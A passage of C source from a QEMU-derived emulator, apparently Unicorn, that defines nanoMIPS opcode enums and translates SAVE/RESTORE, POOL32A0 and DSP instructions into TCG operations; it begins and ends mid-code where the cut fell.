NM_P_BALRSC = 0x08, }; /* P.BR1 instruction pool */ enum { NM_BEQC = 0x00, NM_P_BR3A = 0x01, NM_BGEC = 0x02, NM_BGEUC = 0x03, }; /* P.BR2 instruction pool */ enum { NM_BNEC = 0x00, NM_BLTC = 0x02, NM_BLTUC = 0x03, }; /* P.BRI instruction pool */ enum { NM_BEQIC = 0x00, NM_BBEQZC = 0x01, NM_BGEIC = 0x02, NM_BGEIUC = 0x03, NM_BNEIC = 0x04, NM_BBNEZC = 0x05, NM_BLTIC = 0x06, NM_BLTIUC = 0x07, }; /* P16.SHIFT instruction pool */ enum { NM_SLL16 = 0x00, NM_SRL16 = 0x01, }; /* POOL16C instruction pool */ enum { NM_POOL16C_0 = 0x00, NM_LWXS16 = 0x01, }; /* P16.A1 instruction pool */ enum { NM_ADDIUR1SP = 0x01, }; /* P16.A2 instruction pool */ enum { NM_ADDIUR2 = 0x00, NM_P_ADDIURS5 = 0x01, }; /* P16.ADDU instruction pool */ enum { NM_ADDU16 = 0x00, NM_SUBU16 = 0x01, }; /* P16.SR instruction pool */ enum { NM_SAVE16 = 0x00, NM_RESTORE_JRC16 = 0x01, }; /* P16.4X4 instruction pool */ enum { NM_ADDU4X4 = 0x00, NM_MUL4X4 = 0x01, }; /* P16.LB instruction pool */ enum { NM_LB16 = 0x00, NM_SB16 = 0x01, NM_LBU16 = 0x02, }; /* P16.LH instruction pool */ enum { NM_LH16 = 0x00, NM_SH16 = 0x01, NM_LHU16 = 0x02, }; /* P.RI instruction pool */ enum { NM_SIGRIE = 0x00, NM_P_SYSCALL = 0x01, NM_BREAK = 0x02, NM_SDBBP = 0x03, }; /* POOL32A0 instruction pool */ enum { NM_P_TRAP = 0x00, NM_SEB = 0x01, NM_SLLV = 0x02, NM_MUL = 0x03, NM_MFC0 = 0x06, NM_MFHC0 = 0x07, NM_SEH = 0x09, NM_SRLV = 0x0a, NM_MUH = 0x0b, NM_MTC0 = 0x0e, NM_MTHC0 = 0x0f, NM_SRAV = 0x12, NM_MULU = 0x13, NM_ROTRV = 0x1a, NM_MUHU = 0x1b, NM_ADD = 0x22, NM_DIV = 0x23, NM_ADDU = 0x2a, NM_MOD = 0x2b, NM_SUB = 0x32, NM_DIVU = 0x33, NM_RDHWR = 0x38, NM_SUBU = 0x3a, NM_MODU = 0x3b, NM_P_CMOVE = 0x42, NM_FORK = 0x45, NM_MFTR = 0x46, NM_MFHTR = 0x47, NM_AND = 0x4a, NM_YIELD = 0x4d, NM_MTTR = 0x4e, NM_MTHTR = 0x4f, NM_OR = 0x52, NM_D_E_MT_VPE = 0x56, NM_NOR = 0x5a, NM_XOR = 0x62, NM_SLT = 0x6a, NM_P_SLTU = 0x72, NM_SOV = 0x7a, }; /* CRC32 instruction pool */ enum { NM_CRC32B = 0x00, NM_CRC32H = 0x01, NM_CRC32W = 0x02, NM_CRC32CB = 0x04, NM_CRC32CH = 0x05, NM_CRC32CW = 0x06, }; /* POOL32A5 instruction pool */ enum { NM_CMP_EQ_PH = 0x00, NM_CMP_LT_PH = 0x08, NM_CMP_LE_PH = 0x10, NM_CMPGU_EQ_QB = 0x18, NM_CMPGU_LT_QB = 0x20, NM_CMPGU_LE_QB = 0x28, NM_CMPGDU_EQ_QB = 0x30, NM_CMPGDU_LT_QB = 0x38, NM_CMPGDU_LE_QB = 0x40, NM_CMPU_EQ_QB = 0x48, NM_CMPU_LT_QB = 0x50, NM_CMPU_LE_QB = 0x58, NM_ADDQ_S_W = 0x60, NM_SUBQ_S_W = 0x68, NM_ADDSC = 0x70, NM_ADDWC = 0x78, NM_ADDQ_S_PH = 0x01, NM_ADDQH_R_PH = 0x09, NM_ADDQH_R_W = 0x11, NM_ADDU_S_QB = 0x19, NM_ADDU_S_PH = 0x21, NM_ADDUH_R_QB = 0x29, NM_SHRAV_R_PH = 0x31, NM_SHRAV_R_QB = 0x39, NM_SUBQ_S_PH = 0x41, NM_SUBQH_R_PH = 0x49, NM_SUBQH_R_W = 0x51, NM_SUBU_S_QB = 0x59, NM_SUBU_S_PH = 0x61, NM_SUBUH_R_QB = 0x69, NM_SHLLV_S_PH = 0x71, NM_PRECR_SRA_R_PH_W = 0x79, NM_MULEU_S_PH_QBL = 0x12, NM_MULEU_S_PH_QBR = 0x1a, NM_MULQ_RS_PH = 0x22, NM_MULQ_S_PH = 0x2a, NM_MULQ_RS_W = 0x32, NM_MULQ_S_W = 0x3a, NM_APPEND = 0x42, NM_MODSUB = 0x52, NM_SHRAV_R_W = 0x5a, NM_SHRLV_PH = 0x62, NM_SHRLV_QB = 0x6a, NM_SHLLV_QB = 0x72, NM_SHLLV_S_W = 0x7a, NM_SHILO = 0x03, NM_MULEQ_S_W_PHL = 0x04, NM_MULEQ_S_W_PHR = 0x0c, NM_MUL_S_PH = 0x05, NM_PRECR_QB_PH = 0x0d, NM_PRECRQ_QB_PH = 0x15, NM_PRECRQ_PH_W = 0x1d, NM_PRECRQ_RS_PH_W = 0x25, NM_PRECRQU_S_QB_PH = 0x2d, NM_PACKRL_PH = 0x35, NM_PICK_QB = 0x3d, NM_PICK_PH = 0x45, NM_SHRA_R_W = 0x5e, NM_SHRA_R_PH = 0x66, NM_SHLL_S_PH = 0x76, NM_SHLL_S_W = 0x7e, NM_REPL_PH = 0x07 }; /* POOL32A7 instruction pool */ enum { NM_P_LSX = 0x00, NM_LSA = 0x01, NM_EXTW = 0x03, NM_POOL32AXF = 0x07, }; /* P.SR instruction pool */ enum { NM_PP_SR = 0x00, NM_P_SR_F = 0x01, }; /* P.SHIFT instruction pool */ enum { NM_P_SLL = 0x00, NM_SRL = 0x02, NM_SRA = 0x04, NM_ROTR = 0x06, }; /* P.ROTX instruction pool */ enum { NM_ROTX = 0x00, }; /* P.INS instruction pool */ enum { NM_INS = 0x00, }; /* P.EXT instruction pool */ enum { NM_EXT = 0x00, }; /* POOL32F_0 (fmt) instruction pool */ enum { NM_RINT_S = 0x04, NM_RINT_D = 0x44, NM_ADD_S = 0x06, NM_SELEQZ_S = 0x07, NM_SELEQZ_D = 0x47, NM_CLASS_S = 0x0c, NM_CLASS_D = 0x4c, NM_SUB_S = 0x0e, NM_SELNEZ_S = 0x0f, NM_SELNEZ_D = 0x4f, NM_MUL_S = 0x16, NM_SEL_S = 0x17, NM_SEL_D = 0x57, NM_DIV_S = 0x1e, NM_ADD_D = 0x26, NM_SUB_D = 0x2e, NM_MUL_D = 0x36, NM_MADDF_S = 0x37, NM_MADDF_D = 0x77, NM_DIV_D = 0x3e, NM_MSUBF_S = 0x3f, NM_MSUBF_D = 0x7f, }; /* POOL32F_3 instruction pool */ enum { NM_MIN_FMT = 0x00, NM_MAX_FMT = 0x01, NM_MINA_FMT = 0x04, NM_MAXA_FMT = 0x05, NM_POOL32FXF = 0x07, }; /* POOL32F_5 instruction pool */ enum { NM_CMP_CONDN_S = 0x00, NM_CMP_CONDN_D = 0x02, }; /* P.GP.LH instruction pool */ enum { NM_LHGP = 0x00, NM_LHUGP = 0x01, }; /* P.GP.SH instruction pool */ enum { NM_SHGP = 0x00, }; /* P.GP.CP1 instruction pool */ enum { NM_LWC1GP = 0x00, NM_SWC1GP = 0x01, NM_LDC1GP = 0x02, NM_SDC1GP = 0x03, }; /* P.LS.S0 instruction pool */ enum { NM_LBS9 = 0x00, NM_LHS9 = 0x04, NM_LWS9 = 0x08, NM_LDS9 = 0x0c, NM_SBS9 = 0x01, NM_SHS9 = 0x05, NM_SWS9 = 0x09, NM_SDS9 = 0x0d, NM_LBUS9 = 0x02, NM_LHUS9 = 0x06, NM_LWC1S9 = 0x0a, NM_LDC1S9 = 0x0e, NM_P_PREFS9 = 0x03, NM_LWUS9 = 0x07, NM_SWC1S9 = 0x0b, NM_SDC1S9 = 0x0f, }; /* P.LS.S1 instruction pool */ enum { NM_ASET_ACLR = 0x02, NM_UALH = 0x04, NM_UASH = 0x05, NM_CACHE = 0x07, NM_P_LL = 0x0a, NM_P_SC = 0x0b, }; /* P.LS.E0 instruction pool */ enum { NM_LBE = 0x00, NM_SBE = 0x01, NM_LBUE = 0x02, NM_P_PREFE = 0x03, NM_LHE = 0x04, NM_SHE = 0x05, NM_LHUE = 0x06, NM_CACHEE = 0x07, NM_LWE = 0x08, NM_SWE = 0x09, NM_P_LLE = 0x0a, NM_P_SCE = 0x0b, }; /* P.PREFE instruction pool */ enum { NM_SYNCIE = 0x00, NM_PREFE = 0x01, }; /* P.LLE instruction pool */ enum { NM_LLE = 0x00, NM_LLWPE = 0x01, }; /* P.SCE instruction pool */ enum { NM_SCE = 0x00, NM_SCWPE = 0x01, }; /* P.LS.WM instruction pool */ enum { NM_LWM = 0x00, NM_SWM = 0x01, }; /* P.LS.UAWM instruction pool */ enum { NM_UALWM = 0x00, NM_UASWM = 0x01, }; /* P.BR3A instruction pool */ enum { NM_BC1EQZC = 0x00, NM_BC1NEZC = 0x01, NM_BC2EQZC = 0x02, NM_BC2NEZC = 0x03, NM_BPOSGE32C = 0x04, }; /* P16.RI instruction pool */ enum { NM_P16_SYSCALL = 0x01, NM_BREAK16 = 0x02, NM_SDBBP16 = 0x03, }; /* POOL16C_0 instruction pool */ enum { NM_POOL16C_00 = 0x00, }; /* P16.JRC instruction pool */ enum { NM_JRC = 0x00, NM_JALRC16 = 0x01, }; /* P.SYSCALL instruction pool */ enum { NM_SYSCALL = 0x00, NM_HYPCALL = 0x01, }; /* P.TRAP instruction pool */ enum { NM_TEQ = 0x00, NM_TNE = 0x01, }; /* P.CMOVE instruction pool */ enum { NM_MOVZ = 0x00, NM_MOVN = 0x01, }; /* POOL32Axf instruction pool */ enum { NM_POOL32AXF_1 = 0x01, NM_POOL32AXF_2 = 0x02, NM_POOL32AXF_4 = 0x04, NM_POOL32AXF_5 = 0x05, NM_POOL32AXF_7 = 0x07, }; /* POOL32Axf_1 instruction pool */ enum { NM_POOL32AXF_1_0 = 0x00, NM_POOL32AXF_1_1 = 0x01, NM_POOL32AXF_1_3 = 0x03, NM_POOL32AXF_1_4 = 0x04, NM_POOL32AXF_1_5 = 0x05, NM_POOL32AXF_1_7 = 0x07, }; /* POOL32Axf_2 instruction pool */ enum { NM_POOL32AXF_2_0_7 = 0x00, NM_POOL32AXF_2_8_15 = 0x01, NM_POOL32AXF_2_16_23 = 0x02, NM_POOL32AXF_2_24_31 = 0x03, }; /* POOL32Axf_7 instruction pool */ enum { NM_SHRA_R_QB = 0x0, NM_SHRL_PH = 0x1, NM_REPL_QB = 0x2, }; /* POOL32Axf_1_0 instruction pool */ enum { NM_MFHI = 0x0, NM_MFLO = 0x1, NM_MTHI = 0x2, NM_MTLO = 0x3, }; /* POOL32Axf_1_1 instruction pool */ enum { NM_MTHLIP = 0x0, NM_SHILOV = 0x1, }; /* POOL32Axf_1_3 instruction pool */ enum { NM_RDDSP = 0x0, NM_WRDSP = 0x1, NM_EXTP = 0x2, NM_EXTPDP = 0x3, }; /* POOL32Axf_1_4 instruction pool */ enum { NM_SHLL_QB = 0x0, NM_SHRL_QB = 0x1, }; /* POOL32Axf_1_5 instruction pool */ enum { NM_MAQ_S_W_PHR = 0x0, NM_MAQ_S_W_PHL = 0x1, NM_MAQ_SA_W_PHR = 0x2, NM_MAQ_SA_W_PHL = 0x3, }; /* POOL32Axf_1_7 instruction pool */ enum { NM_EXTR_W = 0x0, NM_EXTR_R_W = 0x1, NM_EXTR_RS_W = 0x2, NM_EXTR_S_H = 0x3, }; /* POOL32Axf_2_0_7 instruction pool */ enum { NM_DPA_W_PH = 0x0, NM_DPAQ_S_W_PH = 0x1, NM_DPS_W_PH = 0x2, NM_DPSQ_S_W_PH = 0x3, NM_BALIGN = 0x4, NM_MADD = 0x5, NM_MULT = 0x6, NM_EXTRV_W = 0x7, }; /* POOL32Axf_2_8_15 instruction pool */ enum { NM_DPAX_W_PH = 0x0, NM_DPAQ_SA_L_W = 0x1, NM_DPSX_W_PH = 0x2, NM_DPSQ_SA_L_W = 0x3, NM_MADDU = 0x5, NM_MULTU = 0x6, NM_EXTRV_R_W = 0x7, }; /* POOL32Axf_2_16_23 instruction pool */ enum { NM_DPAU_H_QBL = 0x0, NM_DPAQX_S_W_PH = 0x1, NM_DPSU_H_QBL = 0x2, NM_DPSQX_S_W_PH = 0x3, NM_EXTPV = 0x4, NM_MSUB = 0x5, NM_MULSA_W_PH = 0x6, NM_EXTRV_RS_W = 0x7, }; /* POOL32Axf_2_24_31 instruction pool */ enum { NM_DPAU_H_QBR = 0x0, NM_DPAQX_SA_W_PH = 0x1, NM_DPSU_H_QBR = 0x2, NM_DPSQX_SA_W_PH = 0x3, NM_EXTPDPV = 0x4, NM_MSUBU = 0x5, NM_MULSAQ_S_W_PH = 0x6, NM_EXTRV_S_H = 0x7, }; /* POOL32Axf_{4, 5} instruction pool */ enum { NM_CLO = 0x25, NM_CLZ = 0x2d, NM_TLBP = 0x01, NM_TLBR = 0x09, NM_TLBWI = 0x11, NM_TLBWR = 0x19, NM_TLBINV = 0x03, NM_TLBINVF = 0x0b, NM_DI = 0x23, NM_EI = 0x2b, NM_RDPGPR = 0x70, NM_WRPGPR = 0x78, NM_WAIT = 0x61, NM_DERET = 0x71, NM_ERETX = 0x79, /* nanoMIPS DSP instructions */ NM_ABSQ_S_QB = 0x00, NM_ABSQ_S_PH = 0x08, NM_ABSQ_S_W = 0x10, NM_PRECEQ_W_PHL = 0x28, NM_PRECEQ_W_PHR = 0x30, NM_PRECEQU_PH_QBL = 0x38, NM_PRECEQU_PH_QBR = 0x48, NM_PRECEU_PH_QBL = 0x58, NM_PRECEU_PH_QBR = 0x68, NM_PRECEQU_PH_QBLA = 0x39, NM_PRECEQU_PH_QBRA = 0x49, NM_PRECEU_PH_QBLA = 0x59, NM_PRECEU_PH_QBRA = 0x69, NM_REPLV_PH = 0x01, NM_REPLV_QB = 0x09, NM_BITREV = 0x18, NM_INSV = 0x20, NM_RADDU_W_QB = 0x78, NM_BITSWAP = 0x05, NM_WSBH = 0x3d, }; /* PP.SR instruction pool */ enum { NM_SAVE = 0x00, NM_RESTORE = 0x02, NM_RESTORE_JRC = 0x03, }; /* P.SR.F instruction pool */ enum { NM_SAVEF = 0x00, NM_RESTOREF = 0x01, }; /* P16.SYSCALL instruction pool */ enum { NM_SYSCALL16 = 0x00, NM_HYPCALL16 = 0x01, }; /* POOL16C_00 instruction pool */ enum { NM_NOT16 = 0x00, NM_XOR16 = 0x01, NM_AND16 = 0x02, NM_OR16 = 0x03, }; /* PP.LSX and PP.LSXS instruction pool */ enum { NM_LBX = 0x00, NM_LHX = 0x04, NM_LWX = 0x08, NM_LDX = 0x0c, NM_SBX = 0x01, NM_SHX = 0x05, NM_SWX = 0x09, NM_SDX = 0x0d, NM_LBUX = 0x02, NM_LHUX = 0x06, NM_LWC1X = 0x0a, NM_LDC1X = 0x0e, NM_LWUX = 0x07, NM_SWC1X = 0x0b, NM_SDC1X = 0x0f, NM_LHXS = 0x04, NM_LWXS = 0x08, NM_LDXS = 0x0c, NM_SHXS = 0x05, NM_SWXS = 0x09, NM_SDXS = 0x0d, NM_LHUXS = 0x06, NM_LWC1XS = 0x0a, NM_LDC1XS = 0x0e, NM_LWUXS = 0x07, NM_SWC1XS = 0x0b, NM_SDC1XS = 0x0f, }; /* ERETx instruction pool */ enum { NM_ERET = 0x00, NM_ERETNC = 0x01, }; /* POOL32FxF_{0, 1} insturction pool */ enum { NM_CFC1 = 0x40, NM_CTC1 = 0x60, NM_MFC1 = 0x80, NM_MTC1 = 0xa0, NM_MFHC1 = 0xc0, NM_MTHC1 = 0xe0, NM_CVT_S_PL = 0x84, NM_CVT_S_PU = 0xa4, NM_CVT_L_S = 0x004, NM_CVT_L_D = 0x104, NM_CVT_W_S = 0x024, NM_CVT_W_D = 0x124, NM_RSQRT_S = 0x008, NM_RSQRT_D = 0x108, NM_SQRT_S = 0x028, NM_SQRT_D = 0x128, NM_RECIP_S = 0x048, NM_RECIP_D = 0x148, NM_FLOOR_L_S = 0x00c, NM_FLOOR_L_D = 0x10c, NM_FLOOR_W_S = 0x02c, NM_FLOOR_W_D = 0x12c, NM_CEIL_L_S = 0x04c, NM_CEIL_L_D = 0x14c, NM_CEIL_W_S = 0x06c, NM_CEIL_W_D = 0x16c, NM_TRUNC_L_S = 0x08c, NM_TRUNC_L_D = 0x18c, NM_TRUNC_W_S = 0x0ac, NM_TRUNC_W_D = 0x1ac, NM_ROUND_L_S = 0x0cc, NM_ROUND_L_D = 0x1cc, NM_ROUND_W_S = 0x0ec, NM_ROUND_W_D = 0x1ec, NM_MOV_S = 0x01, NM_MOV_D = 0x81, NM_ABS_S = 0x0d, NM_ABS_D = 0x8d, NM_NEG_S = 0x2d, NM_NEG_D = 0xad, NM_CVT_D_S = 0x04d, NM_CVT_D_W = 0x0cd, NM_CVT_D_L = 0x14d, NM_CVT_S_D = 0x06d, NM_CVT_S_W = 0x0ed, NM_CVT_S_L = 0x16d, }; /* P.LL instruction pool */ enum { NM_LL = 0x00, NM_LLWP = 0x01, }; /* P.SC instruction pool */ enum { NM_SC = 0x00, NM_SCWP = 0x01, }; /* P.DVP instruction pool */ enum { NM_DVP = 0x00, NM_EVP = 0x01, }; /* * * nanoMIPS decoding engine * */ /* extraction utilities */ #define NANOMIPS_EXTRACT_RT3(op) ((op >> 7) & 0x7) #define NANOMIPS_EXTRACT_RS3(op) ((op >> 4) & 0x7) #define NANOMIPS_EXTRACT_RD3(op) ((op >> 1) & 0x7) #define NANOMIPS_EXTRACT_RD5(op) ((op >> 5) & 0x1f) #define NANOMIPS_EXTRACT_RS5(op) (op & 0x1f) /* Implement nanoMIPS pseudocode decode_gpr(encoded_gpr, 'gpr3'). */ static inline int decode_gpr_gpr3(int r) { static const int map[] = { 16, 17, 18, 19, 4, 5, 6, 7 }; return map[r & 0x7]; } /* Implement nanoMIPS pseudocode decode_gpr(encoded_gpr, 'gpr3.src.store'). */ static inline int decode_gpr_gpr3_src_store(int r) { static const int map[] = { 0, 17, 18, 19, 4, 5, 6, 7 }; return map[r & 0x7]; } /* Implement nanoMIPS pseudocode decode_gpr(encoded_gpr, 'gpr4'). */ static inline int decode_gpr_gpr4(int r) { static const int map[] = { 8, 9, 10, 11, 4, 5, 6, 7, 16, 17, 18, 19, 20, 21, 22, 23 }; return map[r & 0xf]; } /* Implement nanoMIPS pseudocode decode_gpr(encoded_gpr, 'gpr4.zero'). */ static inline int decode_gpr_gpr4_zero(int r) { static const int map[] = { 8, 9, 10, 0, 4, 5, 6, 7, 16, 17, 18, 19, 20, 21, 22, 23 }; return map[r & 0xf]; } static void gen_adjust_sp(DisasContext *ctx, int u) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_op_addr_addi(ctx, tcg_ctx->cpu_gpr[29], tcg_ctx->cpu_gpr[29], u); } static void gen_save(DisasContext *ctx, uint8_t rt, uint8_t count, uint8_t gp, uint16_t u) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int counter = 0; TCGv va = tcg_temp_new(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); while (counter != count) { bool use_gp = gp && (counter == count - 1); int this_rt = use_gp ? 28 : (rt & 0x10) | ((rt + counter) & 0x1f); int this_offset = -((counter + 1) << 2); gen_base_offset_addr(ctx, va, 29, this_offset); gen_load_gpr(tcg_ctx, t0, this_rt); tcg_gen_qemu_st_tl(tcg_ctx, t0, va, ctx->mem_idx, (MO_TEUL | ctx->default_tcg_memop_mask)); counter++; } /* adjust stack pointer */ gen_adjust_sp(ctx, -u); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, va); } static void gen_restore(DisasContext *ctx, uint8_t rt, uint8_t count, uint8_t gp, uint16_t u) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int counter = 0; TCGv va = tcg_temp_new(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); while (counter != count) { bool use_gp = gp && (counter == count - 1); int this_rt = use_gp ? 28 : (rt & 0x10) | ((rt + counter) & 0x1f); int this_offset = u - ((counter + 1) << 2); gen_base_offset_addr(ctx, va, 29, this_offset); tcg_gen_qemu_ld_tl(tcg_ctx, t0, va, ctx->mem_idx, MO_TESL | ctx->default_tcg_memop_mask); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); gen_store_gpr(tcg_ctx, t0, this_rt); counter++; } /* adjust stack pointer */ gen_adjust_sp(ctx, u); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, va); } static void gen_pool16c_nanomips_insn(DisasContext *ctx) { int rt = decode_gpr_gpr3(NANOMIPS_EXTRACT_RT3(ctx->opcode)); int rs = decode_gpr_gpr3(NANOMIPS_EXTRACT_RS3(ctx->opcode)); switch (extract32(ctx->opcode, 2, 2)) { case NM_NOT16: gen_logic(ctx, OPC_NOR, rt, rs, 0); break; case NM_AND16: gen_logic(ctx, OPC_AND, rt, rt, rs); break; case NM_XOR16: gen_logic(ctx, OPC_XOR, rt, rt, rs); break; case NM_OR16: gen_logic(ctx, OPC_OR, rt, rt, rs); break; } } static void gen_pool32a0_nanomips_insn(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rt = extract32(ctx->opcode, 21, 5); int rs = extract32(ctx->opcode, 16, 5); int rd = extract32(ctx->opcode, 11, 5); switch (extract32(ctx->opcode, 3, 7)) { case NM_P_TRAP: switch (extract32(ctx->opcode, 10, 1)) { case NM_TEQ: check_nms(ctx); gen_trap(ctx, OPC_TEQ, rs, rt, -1); break; case NM_TNE: check_nms(ctx); gen_trap(ctx, OPC_TNE, rs, rt, -1); break; } break; case NM_RDHWR: check_nms(ctx); gen_rdhwr(ctx, rt, rs, extract32(ctx->opcode, 11, 3)); break; case NM_SEB: check_nms(ctx); gen_bshfl(ctx, OPC_SEB, rs, rt); break; case NM_SEH: gen_bshfl(ctx, OPC_SEH, rs, rt); break; case NM_SLLV: gen_shift(ctx, OPC_SLLV, rd, rt, rs); break; case NM_SRLV: gen_shift(ctx, OPC_SRLV, rd, rt, rs); break; case NM_SRAV: gen_shift(ctx, OPC_SRAV, rd, rt, rs); break; case NM_ROTRV: gen_shift(ctx, OPC_ROTRV, rd, rt, rs); break; case NM_ADD: gen_arith(ctx, OPC_ADD, rd, rs, rt); break; case NM_ADDU: gen_arith(ctx, OPC_ADDU, rd, rs, rt); break; case NM_SUB: check_nms(ctx); gen_arith(ctx, OPC_SUB, rd, rs, rt); break; case NM_SUBU: gen_arith(ctx, OPC_SUBU, rd, rs, rt); break; case NM_P_CMOVE: switch (extract32(ctx->opcode, 10, 1)) { case NM_MOVZ: gen_cond_move(ctx, OPC_MOVZ, rd, rs, rt); break; case NM_MOVN: gen_cond_move(ctx, OPC_MOVN, rd, rs, rt); break; } break; case NM_AND: gen_logic(ctx, OPC_AND, rd, rs, rt); break; case NM_OR: gen_logic(ctx, OPC_OR, rd, rs, rt); break; case NM_NOR: gen_logic(ctx, OPC_NOR, rd, rs, rt); break; case NM_XOR: gen_logic(ctx, OPC_XOR, rd, rs, rt); break; case NM_SLT: gen_slt(ctx, OPC_SLT, rd, rs, rt); break; case NM_P_SLTU: if (rd == 0) { /* P_DVP */ TCGv t0 = tcg_temp_new(tcg_ctx); switch (extract32(ctx->opcode, 10, 1)) { case NM_DVP: if (ctx->vp) { check_cp0_enabled(ctx); gen_helper_dvp(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); } break; case NM_EVP: if (ctx->vp) { check_cp0_enabled(ctx); gen_helper_evp(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); } break; } tcg_temp_free(tcg_ctx, t0); } else { gen_slt(ctx, OPC_SLTU, rd, rs, rt); } break; case NM_SOV: { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); gen_load_gpr(tcg_ctx, t2, rt); tcg_gen_add_tl(tcg_ctx, t0, t1, t2); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_xor_tl(tcg_ctx, t1, t1, t2); tcg_gen_xor_tl(tcg_ctx, t2, t0, t2); tcg_gen_andc_tl(tcg_ctx, t1, t2, t1); /* operands of same sign, result different sign */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, t0, t1, 0); gen_store_gpr(tcg_ctx, t0, rd); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } break; case NM_MUL: gen_r6_muldiv(ctx, R6_OPC_MUL, rd, rs, rt); break; case NM_MUH: gen_r6_muldiv(ctx, R6_OPC_MUH, rd, rs, rt); break; case NM_MULU: gen_r6_muldiv(ctx, R6_OPC_MULU, rd, rs, rt); break; case NM_MUHU: gen_r6_muldiv(ctx, R6_OPC_MUHU, rd, rs, rt); break; case NM_DIV: gen_r6_muldiv(ctx, R6_OPC_DIV, rd, rs, rt); break; case NM_MOD: gen_r6_muldiv(ctx, R6_OPC_MOD, rd, rs, rt); break; case NM_DIVU: gen_r6_muldiv(ctx, R6_OPC_DIVU, rd, rs, rt); break; case NM_MODU: gen_r6_muldiv(ctx, R6_OPC_MODU, rd, rs, rt); break; case NM_MFC0: check_cp0_enabled(ctx); if (rt == 0) { /* Treat as NOP. */ break; } gen_mfc0(ctx, tcg_ctx->cpu_gpr[rt], rs, extract32(ctx->opcode, 11, 3)); break; case NM_MTC0: check_cp0_enabled(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_mtc0(ctx, t0, rs, extract32(ctx->opcode, 11, 3)); tcg_temp_free(tcg_ctx, t0); } break; case NM_D_E_MT_VPE: { uint8_t sc = extract32(ctx->opcode, 10, 1); TCGv t0 = tcg_temp_new(tcg_ctx); switch (sc) { case 0: if (rs == 1) { /* DMT */ check_cp0_mt(ctx); gen_helper_dmt(tcg_ctx, t0); gen_store_gpr(tcg_ctx, t0, rt); } else if (rs == 0) { /* DVPE */ check_cp0_mt(ctx); gen_helper_dvpe(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); } else { generate_exception_end(ctx, EXCP_RI); } break; case 1: if (rs == 1) { /* EMT */ check_cp0_mt(ctx); gen_helper_emt(tcg_ctx, t0); gen_store_gpr(tcg_ctx, t0, rt); } else if (rs == 0) { /* EVPE */ check_cp0_mt(ctx); gen_helper_evpe(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); } else { generate_exception_end(ctx, EXCP_RI); } break; } tcg_temp_free(tcg_ctx, t0); } break; case NM_FORK: check_mt(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_load_gpr(tcg_ctx, t1, rs); gen_helper_fork(tcg_ctx, t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } break; case NM_MFTR: case NM_MFHTR: check_cp0_enabled(ctx); if (rd == 0) { /* Treat as NOP. */ return; } gen_mftr(env, ctx, rs, rt, extract32(ctx->opcode, 10, 1), extract32(ctx->opcode, 11, 5), extract32(ctx->opcode, 3, 1)); break; case NM_MTTR: case NM_MTHTR: check_cp0_enabled(ctx); gen_mttr(env, ctx, rs, rt, extract32(ctx->opcode, 10, 1), extract32(ctx->opcode, 11, 5), extract32(ctx->opcode, 3, 1)); break; case NM_YIELD: check_mt(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_helper_yield(tcg_ctx, t0, tcg_ctx->cpu_env, t0); gen_store_gpr(tcg_ctx, t0, rt); tcg_temp_free(tcg_ctx, t0); } break; default: generate_exception_end(ctx, EXCP_RI); break; } } /* dsp */ static void gen_pool32axf_1_5_nanomips_insn(DisasContext *ctx, uint32_t opc, int ret, int v1, int v2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; TCGv v0_t; TCGv v1_t; t0 = tcg_temp_new_i32(tcg_ctx); v0_t = tcg_temp_new(tcg_ctx); v1_t = tcg_temp_new(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, t0, v2 >> 3); gen_load_gpr(tcg_ctx, v0_t, ret); gen_load_gpr(tcg_ctx, v1_t, v1); switch (opc) { case NM_MAQ_S_W_PHR: check_dsp(ctx); gen_helper_maq_s_w_phr(tcg_ctx, t0, v1_t, v0_t, tcg_ctx->cpu_env); break; case NM_MAQ_S_W_PHL: check_dsp(ctx); gen_helper_maq_s_w_phl(tcg_ctx, t0, v1_t, v0_t, tcg_ctx->cpu_env); break; case NM_MAQ_SA_W_PHR: check_dsp(ctx); gen_helper_maq_sa_w_phr(tcg_ctx, t0, v1_t, v0_t, tcg_ctx->cpu_env); break; case NM_MAQ_SA_W_PHL: check_dsp(ctx); gen_helper_maq_sa_w_phl(tcg_ctx, t0, v1_t, v0_t, tcg_ctx->cpu_env); break; default: generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free(tcg_ctx, v0_t); tcg_temp_free(tcg_ctx, v1_t); } static void gen_pool32axf_1_nanomips_insn(DisasContext *ctx, uint32_t opc, int ret, int v1, int v2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int16_t imm; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv v0_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, v0_t, v1); switch (opc) { case NM_POOL32AXF_1_0: check_dsp(ctx); 